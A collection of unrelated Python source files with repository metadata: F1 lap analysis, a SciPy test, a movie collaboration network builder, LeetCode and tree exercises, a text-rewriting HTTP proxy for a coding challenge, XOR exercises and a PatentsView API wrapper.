all_sectors = pd.merge(sector1, all_sectors, on=[0,1])
all_sectors.columns = ['NO', 'DRIVER', 'SECTOR_1', 'SECTOR_2', 'SECTOR_3']
all_sectors.drop(0, inplace=True)
all_sectors[['SECTOR_1', 'SECTOR_2', 'SECTOR_3']] = all_sectors[['SECTOR_1', 'SECTOR_2', 'SECTOR_3']].astype(float)
return all_sectors
def get_avg_lap(df):
grouped = lap_times.drop(['GAP', 'LAP', 'RACE'], axis=1).groupby(['NO', 'TIRE', 'TRACK', 'YEAR'], as_index=False)
avg_laps = pd.merge(grouped.count(), grouped.mean(), how='left', on=['NO', 'TIRE', 'TRACK', 'YEAR'])
avg_laps.columns = ['NO', 'TIRE', 'TRACK', 'YEAR', 'COUNT', 'TIME']
return avg_laps
def assign_safety(track, year, lap):
safety_car = {'australia': {2015: {1,2,3},
2016: {17}},
'china': {2015: {54,55,56},
2016: {4,5,6,7,8}},
'hungary': {2015: {43,44,45,46,47,48}},
'belgium': {2015: {20,21}},
'singapore': {2015: {13,14,15,16,17,18,37,38,39,40}},
'russia': {2015: {1,2,3,12,13,14,15,16}},
'usa': {2015: {5,6,7,27,28,29,30,31,32,37,38,39,43,44,45,46}},
'mexico': {2015: {52,53,54,55,56,57}},
'malaysia': {2015: {4,5,6}},
'monaco': {2015: {63,64,65,66,67,68,69,70}},
'austria': {2015: {1,2,3,4,5,6}},
'britain': {2015: {1,2,3,33,34}},
}
if track in safety_car:
if lap in safety_car[track][year]:
return 1
else:
return 0
else:
return 0
def get_stints(df):
previous = None
laps = []
times = []
tires = []
stint = defaultdict(list)
for row in df.iterrows():
if row[1]['GAP'] == 'PIT':
stint[row[1]['NO']].append((laps, times, tire))
laps = []
times = []
tires = []
elif previous == 'PIT':
pass
else:
laps.append(row[1]['LAP'])
times.append(row[1]['TIME'])
tire.append(row[1]['TIRE'])
previous = row[1]['GAP']
return stint
def load_tracks(features=True):
if features:
tracks = pd.read_csv('data/track_features.csv')
else:
tracks = pd.read_csv('data/track_history.csv')
tracks.drop('LAPS', axis=1, inplace=True)
tracks['TRACK'] = tracks['TRACK'].apply(lambda x: x.lower())
return tracks
def load_drivers():
# Load driver list as GLOBAL variable
return pd.read_csv('data/drivers.csv')
def create_race_features(filename):
year, race_num, track = filename.split('_')
# Load lap times for all drivers
lap_data = pd.read_csv('data/lap_history/{filename}_lap_history.csv'.format(filename=filename), header=None)
lap_times = assign_lap(lap_data)
lap_times['TIME'] = convert_time(lap_times['TIME'])
lap_times.sort_values(by=['NO', 'LAP'], inplace=True)
lap_times['LAP'] = lap_times['LAP'].astype(int)
# Load Tire strategy data
tire_data = pd.read_csv('data/tire_strategy/{filename}.csv'.format(filename=filename))
tire_strat = get_tires(tire_data)
# Load Driver list
driver_list = load_drivers()
# Join Driver, Name, No. to tire data and sort by No.
tire_strat = pd.merge(driver_list, tire_strat, on='NAME')
tire_strat.drop(['NAME', 'DRIVER'], axis=1, inplace=True)
# Append tire data to lap data
mask = tire_strat.iloc[:,1:].notnull().values
lap_times['TIRE'] = tire_strat[tire_strat.columns[1:]].values[mask].flatten()
lap_times['TRACK'] = track
lap_times['YEAR'] = int(year)
lap_times['RACE'] = race_num
lap_times['GAP'] = lap_times['GAP'].apply(lambda x: x.strip())
return lap_times
def assign_stint_lap(df):
df['STINT_LAP'] = 1
idx = df[df['GAP'] == 'PIT'].index
start = 0
for val in idx:
df['STINT_LAP'].ix[start:val] = df.ix[start:val]['STINT_LAP'].cumsum()
start = val + 1
end = df.index[-1]
df['STINT_LAP'].ix[start:end] = df.ix[start:end]['STINT_LAP'].cumsum()
return df
def remove_pits(df):
idx = []
previous = None
for row in df.iterrows():
if row[1]['GAP'] == 'PIT' or previous == 'PIT':
idx.append(row[0])
previous = row[1]['GAP']
return df.drop(idx, axis=0)
def plot_drivers(df, race):
sn.set_style(style='whitegrid')
year, race_num, track = race.split('_')
this_race = df[(df['TRACK'] == track) & (df['YEAR'] == int(year))]
for num in this_race['NO'].unique():
driver_idx = this_race['NO'] == num
plt.figure(figsize=(12,6))
plt.title('{} {} - Driver No. {}'.format(track.upper(), year, num))
plt.xlim([0, this_race['LAP'].max() + 1])
plt.scatter(this_race['LAP'][driver_idx], this_race['TIME'][driver_idx], c=this_race['TIRE'][driver_idx].apply(assign_color), alpha=1)
plt.show()
def plot_race(df, race):
year, race_num, track = race.split('_')
this_race = df[(df['TRACK'] == track) & (df['YEAR'] == int(year))]
plt.figure(figsize=(12,6))
plt.title('{} {}'.format(track.upper(), year))
plt.xlim([0, this_race['LAP'].max() + 1])
plt.scatter(this_race['LAP'], this_race['TIME'], c=this_race['TIRE'].apply(assign_color), alpha=.5)
plt.show()
| true |
8d3e66f452c1789ffa2c4b52a0e530d94f8cb979 | Python | bioCKO/lpp_Script | /pacbiolib/thirdparty/pythonpkgs/scipy/scipy_0.9.0+pbi86/lib/python2.7/site-packages/scipy/linalg/tests/test_lapack.py | UTF-8 | 1,563 | 2.546875 | 3 | [
"BSD-2-Clause"
] | permissive | #! python
#
# Created by: Pearu Peterson, September 2002
#
from numpy.testing import TestCase, run_module_suite, assert_equal, \
assert_array_almost_equal, assert_
from numpy import ones
from scipy.linalg import flapack, clapack
class TestFlapackSimple(TestCase):
def test_gebal(self):
a = [[1,2,3],[4,5,6],[7,8,9]]
a1 = [[1,0,0,3e-4],
[4,0,0,2e-3],
[7,1,0,0],
[0,1,0,0]]
for p in 'sdzc':
f = getattr(flapack,p+'gebal',None)
if f is None: continue
ba,lo,hi,pivscale,info = f(a)
assert_(not info,`info`)
assert_array_almost_equal(ba,a)
assert_equal((lo,hi),(0,len(a[0])-1))
assert_array_almost_equal(pivscale,ones(len(a)))
ba,lo,hi,pivscale,info = f(a1,permute=1,scale=1)
assert_(not info,`info`)
#print a1
#print ba,lo,hi,pivscale
def test_gehrd(self):
a = [[-149, -50,-154],
[ 537, 180, 546],
[ -27, -9, -25]]
for p in 'd':
f = getattr(flapack,p+'gehrd',None)
if f is None: continue
ht,tau,info = f(a)
assert_(not info,`info`)
class TestLapack(TestCase):
def test_flapack(self):
if hasattr(flapack,'empty_module'):
#flapack module is empty
pass
def test_clapack(self):
if hasattr(clapack,'empty_module'):
#clapack module is empty
pass
if __name__ == "__main__":
run_module_suite()
| true |
eae91c78ac57a6c3bd09d64e39b2ab0bdda0fe3e | Python | AlexTK2012/HKU-7507-Visual-Analysis | /python/process_data_human.py | UTF-8 | 10,785 | 3.65625 | 4 | [] | no_license | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
movies表字段:
budget,genres,homepage,id,keywords,original_language,original_title,overview,popularity,production_companies,production_countries,release_date,revenue,runtime,spoken_languages,status,tagline,title,vote_average,vote_count
credits表字段:
movie_id,title,cast,crew
Goal: 只取top100 电影里每部的前两个演员+前两个导演,计算
Result:
"""
import json
import pandas as pd
import numpy as np
# 加载movies 表, 电影基本属性数据
def load_tmdb_movies(path):
df = pd.read_csv(path)
return df
# 加载credits 表, 电影-演员-导演数据
def load_tmdb_credits(path):
df = pd.read_csv(path)
json_columns = ['cast', 'crew']
for column in json_columns:
df[column] = df[column].apply(json.loads)
return df
# 写文件
def write_data(path, data):
# Writing JSON data
with open(path, 'w') as f:
json.dump(data, f)
# 去重 list中元素为字典的且字典部分key相同的list元素
def remove_duplicate(dict_list):
seen = set()
new_dict_list = []
for dict in dict_list:
# 只根据 id 去重,不考虑一个人会有多个角色的场景。相同id 的数据,只保留先出现的。
t_dict = {'id': dict['id']}
tmp = tuple(t_dict.items())
if tmp not in seen:
seen.add(tmp)
new_dict_list.append(dict)
return new_dict_list
# 计算主演 + 主导演数据
# top100数据:
# 导演数!=1 的电影数量 : 13
# 去重前, 演员+导演 总计人数: 313
# 去重前, 导演数量 : 113
# 去重后, 演员+导演 总计人数: 209
# 去重后, 导演数量 : 69
# Return: 所有参与者(演员+导演)数据, 格式:{id,name,job,gender}
def compute_main_human_data(dataframe):
data = []
count = 0
# 逐行检测:movie_id,title,cast,crew
for index, row in dataframe.iterrows():
# 只取前2个演员
for cast in row.cast[0:2]:
item = {'id': cast['id'], 'name': cast['name'],
'job': 'Actor', 'gender': cast['gender']}
data.append(item)
# if item['id'] == 1269:
# print(item)
# 遍历 crew 数据:credit_id,department,gender,id,job,name
director_number = 0
for crew in row.crew:
if crew['job'] == 'Director':
item = {'id': crew['id'], 'name': crew['name'],
'job': 'Director', 'gender': crew['gender']}
data.append(item)
# Kevin Costner 即是主演也是主导演,去重的时候,把他作为主导演的数据去掉了。
# if item['id'] == 1269:
# print(item)
director_number += 1
if(director_number == 2):
# print("主导演数量大于1的电影 : ", index)
break
# 一部电影不止一个 or 没有 Director : 确实有不少奇怪的数据
if director_number != 1:
# print("movie id:", row.movie_id, " ,title:",
# row.title_y, " ,director_num:", director_number)
count += 1
print("主要导演数!=1 的电影数量 :", count)
print("去重前, 主要演员+导演 总计人数: ", len(data))
print("去重前, 主要导演数量 :", len(list(x for x in data if x['job'] == 'Director')))
# 对 human_data 去重
data = remove_duplicate(data)
# 人数还是多,感觉还要进一步筛选
print("去重后, 主要演员+导演 总计人数: ", len(data))
# python lambda 表达式
print("去重后, 主要导演数量 :", len(list(x for x in data if x['job'] == 'Director')))
# 等同于
# print("Director num:",len(list(filter(lambda x: x['job'] == 'Director', data))))
return data
# dataframe: top100电影list(含演员+导演字段)
# nodes: 主要演员+导演的list,格式:{id,name,job,gender}
#
# 构建N*N 的二维数组 node_matrix,N=len(human_data),
# 对 x!=y, node_matrix[x,y] = x和y 两人共事过的电影数
# Goal:计算矩阵
def compute_matrix(dataframe, nodes):
# edge_matrix 保存边矩阵, edge_matrix[x][y] 代表xy两人共事次数。就是network 里边的宽度,越宽代表这两人合作次数越多。
edge_matrix = np.zeros((len(nodes), len(nodes)), dtype=np.int)
# node_matrix 保存点矩阵, node_matrix[x] 代表第X人共事过 node_matrix[x] 个人。就是 network里点的大小,越大代表这人合作过的人越多。
node_matrix = np.zeros(len(nodes), dtype=np.int)
# 逐行检测:movie_id,title,cast,crew
for index, row in dataframe.iterrows():
# # 这几个是有2个主演 + 2个主导演的电影
# if index in [8, 15, 24, 35, 40, 45, 52, 61, 66, 76, 82, 88, 99]:
# print(" 再看电影 ", index)
# data 保存这部电影中主演的演员+导演 对应human_data 的序号索引(下标)
data = []
# 遍历 cast 数据:cast_id,character,credit_id,gender,id,name,order
for cast in row.cast[0:2]:
item = {'id': cast['id'], 'name': cast['name'],
'job': 'Actor', 'gender': cast['gender']}
try:
tmp = nodes.index(item)
if (tmp not in data):
data.append(tmp)
except ValueError:
# tmp not in nodes list,
# 根据item 去human_data中查询index,可能出现某人在human_data 中存的是director,此处确实actor角色,导致查不到,此类数据忽略
tmp = -1
# 遍历 crew 数据:credit_id,department,gender,id,job,name
director_number = 0
for crew in row.crew:
if crew['job'] == 'Director':
item = {'id': crew['id'], 'name': crew['name'],
'job': 'Director', 'gender': crew['gender']}
try:
# 只取电影的前两个导演
tmp = nodes.index(item)
if (tmp not in data):
data.append(tmp)
except ValueError:
# 此处忽略即是主导演又是主演员
tmp = -1
director_number += 1
if(director_number == 2):
break
# 遍历行数据中的所有人
for x in data:
# 构建 node 的所有边
for y in data:
if x != y:
# 对于 x!=y, 说明x 与 y 共事次数+1
edge_matrix[x][y] += 1
# node_matrix[x] += 1 # 这样是错的,可能[2,5,6],[2,5,6],实际2只与5,6合作过,但这儿就计算错了
# 计算 每个人共事过多少人
for i in range(len(nodes)):
for tmp in edge_matrix[i]:
if tmp > 0:
# 遍历此人的边(和别人的共事次数)
node_matrix[i] += 1
# node_matrix = edge_matrix 列元素之和,或edge_matrix 行元素之和
# edge_matrix 是共事次数的邻接矩阵,就是network 里边的宽度
print(all_np(edge_matrix))
# 将对称矩阵的一半数据去掉
for i in range(len(nodes)):
for j in range(0, i):
edge_matrix[i][j] = 0
dict_num = all_np(edge_matrix)
for tmp in dict_num:
print("任意两人共事 ", tmp, " 次的情况发生次数 ", dict_num[tmp])
# newNodes = []
Edges = []
# 遍历 edge_matrix 邻接矩阵的 一半 (为了不重复存储边信息),存储edge 信息
for i in range(len(nodes)):
# echart 需要nodes去除 id 字段
nodes[i].pop("id", None)
# node的大小为 此人共事别人的次数
if node_matrix[i] == 0:
print("存在无共事的人,确实不可能")
# 设置点的大小,越大代表此人共事过的人越多
nodes[i]["symbolSize"] = int(4 + node_matrix[i]*2)
for j in range(i+1, len(nodes)):
value = edge_matrix[i][j]
# # 生成 d3 数据
# if value > 0 and nodes[i]['job'] == 'Actor':
# if value > 0:
# # 只存储共事次数大于0 的b边
# Edges.append(
# {'source': nodes[i]['id'], 'target': nodes[j]['id'], 'value': int(value)})
# # d3 节点里需要group 字段
# if nodes[i]['job'] == 'Actor':
# nodes[i]["group"] = 0
# else:
# nodes[i]["group"] = 1
# 生成echart 数据
# 只获取以导演为中心的边数据
# if value > 1 and nodes[i]['job'] == 'Director':
# 只存储共事次数大于1 的数据,
if value > 0:
# 设置边的宽度,边越宽代表越宽代表两人合作次数越多
Edges.append(
{'source': nodes[i]['name'], 'target': nodes[j]['name'],
'lineStyle': {'width':int(value)*2}})
if nodes[i]['job'] == 'Actor':
nodes[i]["category"] = 0
else:
nodes[i]["category"] = 1
if nodes[j]['job'] == 'Actor':
nodes[j]["category"] = 0
else:
nodes[j]["category"] = 1
print("只取共事次数大于0的数据, 共有 ", len(nodes), " 人, 导演有", len(
list(x for x in nodes if x['job'] == 'Director')), " 人, 共有 ", len(Edges), " 边")
# echart 还需要其他两个字段
categories = [{
"name": "Actor",
"keyword": {}
}, {
"name": "Director",
"keyword": {}
}
]
network_json = {'nodes': nodes, 'links': Edges,
"type": "force", "categories": categories}
# network_json = {'nodes': nodes, 'links': Edges}
return network_json
# Numpy花式索引,获取所有元素的出现次数
def all_np(arr):
arr = np.array(arr)
key = np.unique(arr)
result = {}
for k in key:
mask = (arr == k)
arr_new = arr[mask]
v = arr_new.size
result[k] = v
return result
# 加载电影-演员-导演数据
# credits = load_tmdb_credits("./data/tmdb_5000_credits.csv")
# top100 电影
credits = load_tmdb_credits("./data/tmdb_top100_data.csv")
# 参与者(演员+导演)数据
main_human_data = compute_main_human_data(credits)
# write_data("./data/human_data.json", human_data)
# 保存点边数据
network_json_data = compute_matrix(credits, main_human_data)
write_data("./tmp/network_echart_main_actor.json", network_json_data)
# write_data("./tmp/network_d3_main_actor.json", network_json_data)
| true |
a9ce2df5e3ba5fef5b7d1ea6205b45e881608e08 | Python | jingwanha/algorithm-problems | /leetcode/49_medium(1).py | UTF-8 | 888 | 3.828125 | 4 | [] | no_license | # https://leetcode.com/problems/group-anagrams/
from typing import List
class Solution:
# 첫 풀이 방법
# 수행시간이 n제곱이기 때문에 Time Limit Exceeded 에러 발생
# defaultdict를 이용하여 n 시간만에 풀이 가능
def groupAnagrams(self, strs: List[str]) -> List[List[str]]:
anagrams = []
while strs:
word = strs.pop()
group = []
for s in strs:
if ''.join(sorted(s)) == ''.join(sorted(word)): # 문자열을 정렬하여 동일한지 비교
group.append(s)
if group:
for g in group : strs.remove(g)
group.append(word)
anagrams.append(group)
return anagrams
if __name__=='__main__':
strs = ["eat","tea","tan","ate","nat","bat"]
sol = Solution()
print(sol.groupAnagrams(strs)) | true |
a8dce830a2a379b7d5a52d91e149cf2700851644 | Python | jupmorenor/201520-redes1-Protocolo | /src/nucleo/transmisor.py | UTF-8 | 1,100 | 3.0625 | 3 | [] | no_license | # -*- coding:utf-8 -*-
'''
Created on 22/11/2015
@author: Juan Pablo Moreno - 20111020059
'''
import socket
class Transmisor(object):
'''
Clase que implementa la conexion, transmision y recepcion de mensajes
mediante la encapsulacion de un socket
'''
def __init__(self):
self._conector = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket = None
self._dir = ""
self.tamMensaje = 0
def crear_servidor(self, port):
nombre = socket.gethostname()
self._conector.bind((nombre, port))
self._conector.listen(5)
return nombre
def conectar_servidor(self):
self._socket, self._dir = self._conector.accept()
return True
def conectar_cliente(self, host):
self._conector.connect(host)
def enviar(self, mensaje):
if self._socket is None:
self._conector.send(mensaje)
else:
self._socket.send(mensaje)
def recibir(self):
mensaje = ""
if self._socket is None:
mensaje += self._conector.recv(64)
else:
mensaje = self._socket.recv(64)
return mensaje
def terminar(self):
self._conector.close()
| true |
b9c0444dfc35cf6aae45a076fd7bbbffe08aacd5 | Python | Sebibebi67/Project_Advanced_Algo | /code/validercorde.py | UTF-8 | 715 | 3 | 3 | [] | no_license | from lib import *
s = [Point(-9,3), Point(-2,5), Point(0,4), Point(1,1), Point(-1,-2), Point(-4,-4), Point(-9,-1), Point(-10,1)]
#Hexagone 0,7
#c = [(2,6)]
def exist(c,i,j):
return (i,j) in c or (j,i) in c
def intersectionCorde(a,b,c,d):
min1 = min(a,b)
max1 = max(a,b)
min2 = min(c,d)
max2 = max(c,d)
return (min1 < min2 and min2 < max1 and max1 < max2) or (min2 < min1 and min1 < max2 and max2 < max1)
def coupe(c,i,j):
for k in range(len(c)):
if intersectionCorde(i,j,c[k][0],c[k][1]):
return True
return False
def validerCorde(c,l,i,j):
if j>=i-1 and j<=i+1 or (j==l-1 and i==0) or (i==l-1 and j==0):
return False
return not exist(c,i,j) and not coupe(c,i,j)
#print(validerCorde(2,3)) | true |
1290d62b7079c92d1e3e3aabf508de6a59a24757 | Python | boogiefromzk/python_proxy | /proxy.py | UTF-8 | 8,258 | 2.703125 | 3 | [] | no_license | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""Proxy server for Ivelum test:
https://github.com/ivelum/job/blob/master/code_challenges/python.md
Bugaevsky T., 2017, zk.boogie@gmail.com
"""
import http.server
import urllib.request
import urllib.parse
import urllib.error
import html
import io
import shutil
import re
import html.parser
import http.client
import socketserver
__version__ = "0.1"
class UserHTMLParser(html.parser.HTMLParser):
"""HTML parser for ContentHandler class
Replaces URLs to stay inside the proxy and performs user defined regular expression replacement on text contents.
"""
pattern = r''
replacement = ''
cur_tag = ''
data = []
server_base_url = ''
target_base_url = ''
def __init__(self, pattern=r'', replacement='', server_base_url='', target_base_url=''):
self.server_base_url = server_base_url
self.target_base_url = target_base_url
self.pattern = pattern
self.replacement = replacement
self.data = []
html.parser.HTMLParser.__init__(self)
def handle_starttag(self, tag, attributes):
# Saving the last tag to know which tag content is processed in handle_data.
tag = tag.lower()
self.cur_tag = tag
# Processing URL replacements in tag attributes.
self.data.append('<' + tag)
for name, value in attributes:
name = name.lower()
if value is not None:
# Processing attributes that might contain URL.
if (tag == 'a' and name == 'href') \
or (tag == 'img' and name == 'src') \
or (tag == 'link' and name == 'href') \
or (tag == 'iframe' and name == 'src') \
or (tag == 'script' and name == 'src'):
# Checking the domain of the URL.
reg_exp = re.compile(r'^([a-z]+://[^/]*)[/?](.*)?$', re.I)
url_base_url = reg_exp.sub('\g<1>', value)
if url_base_url == value:
if value.startswith('//'):
# URLs without protocol should have one when getting content.
value = 'http:' + value
url_base_url = 'http:' + url_base_url
else:
# URLs without domain are for resources on the target domain.
value = self.target_base_url + value
url_base_url = self.target_base_url
if url_base_url == self.target_base_url:
# URLs on the target domain are processed as URLs on the server domain.
value = reg_exp.sub(self.server_base_url + '/\g<2>', value)
else:
# URLs on other domains are passed entire the URL in the url query parameter.
value = self.server_base_url + '/?url=' + urllib.parse.quote_plus(value)
self.data.append(' ' + name + '="' + html.escape(value) + '"')
else:
self.data.append(' ' + name)
self.data.append('>')
def handle_endtag(self, tag):
single_tags = ['img', 'meta', 'link', 'input', 'br', 'hr']
if tag not in single_tags:
self.data.append('</' + tag + '>')
def handle_data(self, data):
skip_tags = ['script', 'style']
if self.cur_tag not in skip_tags:
reg_exp = re.compile(self.pattern, re.I)
data = reg_exp.sub(self.replacement, data)
self.data.append(html.escape(data))
else:
self.data.append(data)
def get_data(self):
return ''.join(self.data)
class ContentHandler(http.server.BaseHTTPRequestHandler):
"""Handles request from the server.
Performs replacements in text and keeps links working.
"""
target_base_url = ''
server_base_url = ''
server_address = ('', 0)
pattern = r''
replacement = ''
def __init__(self, target_base_url, server_address, pattern, replacement, request, client_address, server):
self.target_base_url = target_base_url
self.server_base_url = 'http://%s:%d' % server_address
self.server_address = server_address
self.pattern = pattern
self.replacement = replacement
try:
http.server.BaseHTTPRequestHandler.__init__(self, request, client_address, server)
except ConnectionError as e:
pass # Possible connection reset error (client connection closed)
def do_GET(self):
"""Serve a GET request."""
source = self.open_url(self.target_base_url + self.path)
if source:
try:
shutil.copyfileobj(source, self.wfile)
except IOError as e:
pass # Possible broken pipe (client connection closed)
finally:
source.close()
def open_url(self, url):
"""Downloads the file content by the URL.
The data is also processed according to the class designation.
"""
# Restoring URLs from other domains
reg_exp = re.compile(r'^.*url=(.*?)$', re.I)
if reg_exp.match(url):
url = urllib.parse.unquote_plus(reg_exp.sub('\g<1>', url))
# Reading URL content and encoding
content_received = False
url_content = None
full_content_type = 'text/html; charset=utf-8'
content_type = 'text/html'
encoding = 'utf-8'
url_timeout = 3.0
try:
url_content = urllib.request.urlopen(url, None, url_timeout)
content_received = True
except urllib.error.URLError as e:
pass # Unable to get response for the URL, details: print(e.reason)
if content_received:
full_content_type = url_content.getheader('Content-type', full_content_type)
reg_exp = re.compile(r'^(.*?);\s*charset=(.*?)$', re.I)
content_type = reg_exp.sub('\g<1>', full_content_type)
if content_type != full_content_type:
encoding = reg_exp.sub('\g<2>', full_content_type)
data = b''
if url_content is not None:
# Processing content
data = url_content.read()
if content_type == 'text/html':
parser = UserHTMLParser(self.pattern, self.replacement, self.server_base_url, self.target_base_url)
parser.feed(data.decode(encoding))
data = parser.get_data().encode(encoding)
# Generating output
f = io.BytesIO()
f.write(data)
f.seek(0)
if content_received:
self.send_response(200)
else:
self.send_response(404)
self.send_header("Content-type", full_content_type)
self.send_header("Content-Length", str(len(data)))
self.end_headers()
return f
def address_string(self):
"""Reverse DNS bugfix
https://stackoverflow.com/questions/2617615/slow-python-http-server-on-localhost
"""
host, port = self.server_address[:2]
# return socket.getfqdn(host)
return host
class ThreadedHTTPServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
""" This class allows to handle requests in separated threads.
No further content needed, don't touch this.
https://stackoverflow.com/questions/8403857/python-basehttpserver-not-serving-requests-properly
"""
def run(ip='127.0.0.1', port=80, target_base_url='https://ya.ru', pattern=r'', replacement=''):
server_address = (ip, port)
# Adding arguments to the handler
def handler(*args):
ContentHandler(target_base_url, server_address, pattern, replacement, *args)
httpd = None
try:
httpd = ThreadedHTTPServer(server_address, handler)
httpd.serve_forever()
print('Ctrl + C to stop the proxy server.')
except KeyboardInterrupt:
print('Shutting down the proxy server.')
httpd.socket.close()
run('127.0.0.1',
8232,
'https://habrahabr.ru',
r'(?<![a-zа-я])([a-zа-я]{6})(?![a-zа-я])', # Case insensitive
'\g<1>™')
| true |
0eb619b301248a534ae751fc025c304ced4e57ed | Python | windard/ModernCryptography | /cryptopals/quiz2.py | UTF-8 | 948 | 3.390625 | 3 | [] | no_license | # coding=utf-8
def hex2num(strings1,strings2):
text = ""
for x in xrange(0,len(strings1),2):
text += hex(int(strings1[x:x+2],16) ^ int(strings2[x:x+2],16))[2:]
return text
def hex2num(strings1,strings2):
return "".join([hex(int(strings1[x:x+2],16) ^ int(strings2[x:x+2],16))[2:] for x in xrange(0,len(strings1),2)])
strings1 = "1c0111001f010100061a024b53535009181c"
strings2 = "686974207468652062756c6c277320657965"
print hex2num(strings1,strings2)
def strxor(a, b): # xor two strings of different lengths
if len(a) > len(b):
return "".join([chr(ord(x) ^ ord(y)) for (x, y) in zip(a[:len(b)], b)])
else:
return "".join([chr(ord(x) ^ ord(y)) for (x, y) in zip(a, b[:len(a)])])
def hex2bin(a):
return "".join(["%04d"%(int(bin(int(x,16))[2:])) for x in a])
def hex2xor2bin(a):
return "".join(["%04d"%(int(bin(15^int(x,16))[2:])) for x in a])
print hex2bin("ab24bd2a1b7ac3")
print hex2xor2bin("ab24bd2a1b7ac3") | true |
f0e3ec0a058b32996d2e686b5d32885d24bf92cb | Python | Shiv2157k/leet_code | /revisited/trees/level_order_traversal.py | UTF-8 | 1,686 | 3.671875 | 4 | [] | no_license | from typing import List
from collections import deque
class TreeNode:
def __init__(self, val: int, left:int=None, right:int=None):
self.val = val
self.left = left
self.right = right
class BinaryTree:
def get_level_order_traversal(self, root: "TreeNode") -> List[List[int]]:
"""
Approach: Depth First Search
Time Complexity: O(N)
Space Complexity: O(H)
:param root:
:return:
"""
levels = []
if not root:
return levels
def dfs(node: "TreeNode", level: int):
if len(levels) == level:
levels.append([])
levels[level].append(node.val)
if node.left:
dfs(node.left, level + 1)
if node.right:
dfs(node.right, level + 1)
dfs(root, 0)
return levels
def get_level_order_traversal_(self, root: "TreeNode") -> List[List[int]]:
"""
Approach: Breadth First Search
Time Complexity: O(N)
Space Complexity: O(N)
:param root:
:return:
"""
levels = []
if not root:
return levels
queue, level = deque([root]), 0
while queue:
levels.append([])
level_nodes = []
for _ in range(len(queue)):
node = queue.popleft()
level_nodes.append(node.val)
levels[level].append(level_nodes)
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
level += 1
return levels
| true |
91ec96f2f81f3462e4457518dd3f0b1405b22c6a | Python | Coutinho306/ML | /Templates/Regression Template.py | UTF-8 | 1,427 | 3.515625 | 4 | [] | no_license |
# coding: utf-8
# # Regression Templates
# ### Importing Libraries
# In[ ]:
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import os
# ### Setting Datasets directory and Importing dataset
# In[ ]:
os.chdir("C:\\Users\\Thiago\\Desktop\\Python-ML\\Datasets")
dataset = pd.read_csv("Position_Salaries.csv")
# ### Creating features and target variables
# In[ ]:
X = dataset.iloc[:,1:2].values
y = dataset.iloc[:,2].values
# ### Splitting in Training and Test set
# In[ ]:
from sklearn.model_selection import train_test_split
X_treino,X_teste,y_treino,y_teste = train_test_split(X, y, test_size=0.2, random_state=0)
# ### Fitting the Regression model
# ### Predicting Results
# In[ ]:
y_pred = regressor.predict()
# ### Visualiazing Regression Results
# In[ ]:
plt.figure(figsize = (10,7))
plt.scatter(X, y , color ="red")
plt.plot(X, regressor.predict(X), color = "blue")
plt.title("Truth or Bluff (Regression Model)")
plt.xlabel("Position Level")
plt.ylabel("Salary")
plt.show()
# ### Visualiazing Regression Results in Higher Resolution
# In[ ]:
X_grid = np.arrange(range(min(X), max(X), 0.1))
X_grid = np.reshape(len(X_grid), 1)
plt.figure(figsize = (10,7))
plt.scatter(X, y , color ="red")
plt.plot(X_grid, regressor.predict(X_grid), color = "blue")
plt.title("Truth or Bluff (Regression Model)")
plt.xlabel("Position Level")
plt.ylabel("Salary")
plt.show()
| true |
ec53003190925e827e9a67f0c23cf2178b6899f1 | Python | j415/DjangoBasics | /0730-线程、进程、协程/3、线程/11.线程通信.py | UTF-8 | 422 | 3.15625 | 3 | [] | no_license | import threading, time
def func():
# 事件对象
event = threading.Event()
def run():
for i in range(5):
#阻塞,等待事件的触发
event.wait()
# 重置
event.clear()
print("aspiring-----%d" %i)
t =threading.Thread(target=run).start()
return event
e = func()
#触发事件
for i in range(5):
time.sleep(2)
e.set()
| true |
01fd0eb7d49ad7c1837e7b16864ef90919cd9926 | Python | nxlr/PatentsView-APIWrapper | /api_wrapper.py | UTF-8 | 3,844 | 2.734375 | 3 | [] | no_license | from __future__ import print_function
import configparser
import json
import os
import requests
import json_to_csv
import sys
import pandas as pd
def query(configfile):
# Query the PatentsView database using parameters specified in configfile
parser = configparser.ConfigParser()
parser.read(configfile)
# Loop through the separate queries listed in the config file.
for q in parser.sections():
print("Running query: ", q)
# Parse parameters from config file
entity = json.loads(parser.get(q, 'entity'))
url = 'http://www.patentsview.org/api/'+entity+'/query?'
input_file = json.loads(parser.get(q, 'input_file'))
directory = json.loads(parser.get(q, 'directory'))
input_type = json.loads(parser.get(q, 'input_type'))
fields = json.loads(parser.get(q, 'fields'))
try:
# If specified, 'sort' should be a list of dictionaries, specifying
# the order of keys and direction of each key.
sort = json.loads(parser.get(q, 'sort'))
sort_fields, sort_directions = [], []
for dct in sort:
for field in dct:
# We can only sort by fields that are in the data
if field in fields:
sort_fields.append(field)
sort_directions.append(dct[field])
if len(sort_fields) == 0:
sort_fields = [fields[0]]
sort_directions = ["asc"]
except:
sort_fields = [fields[0]]
sort_directions = ["asc"]
criteria = {"_and": [json.loads(parser.get(q, option)) for option in
parser.options(q) if option.startswith('criteria')]}
item_list = list(set(open(os.path.join(directory, input_file)).read().split('\n')))
results_found = 0
item_list_len = len(item_list)
for item in item_list:
params = {
'q': {"_and": [{input_type: item}, criteria]},
'f': fields
}
r = requests.post(url, data=json.dumps(params))
if 400 <= r.status_code <= 499:
print("Client error when quering for value {}".format(item))
elif r.status_code >= 500:
print("Server error when quering for value {}. You may be exceeding the maximum API request size (1GB).".format(item))
elif json.loads(r.text)['count'] != 0:
outp = open(os.path.join(directory, q + '_' + \
str(results_found) + '.json'), 'w')
print(r.text, end = '', file=outp)
outp.close()
results_found += 1
if results_found == 0:
print("Query {} returned no results".format(q))
else:
# Output merged CSV of formatted results.
json_to_csv.main(directory, q, results_found)
# Clean csv: reorder columns, drop duplicates, sort, then save
output_filename = os.path.join(directory, q+'.csv')
df = pd.read_csv(output_filename, dtype=object, encoding='Latin-1')
df = df[fields].drop_duplicates().sort_values(by=sort_fields,
ascending=[direction != 'desc' for direction in sort_directions])
df.to_csv(output_filename, index=False)
print('({} rows returned)'.format(len(df)))
if __name__ == '__main__':
if sys.version_info[0] != 3:
print("Please use Python version 3; you are using version:", sys.version)
sys.exit(1)
if len(sys.argv) < 2:
print("USAGE: python api_wrapper.py config_file")
sys.exit(1)
if not os.path.isfile(sys.argv[1]):
print("File not found: ", sys.argv[1])
query(sys.argv[1]) | true |
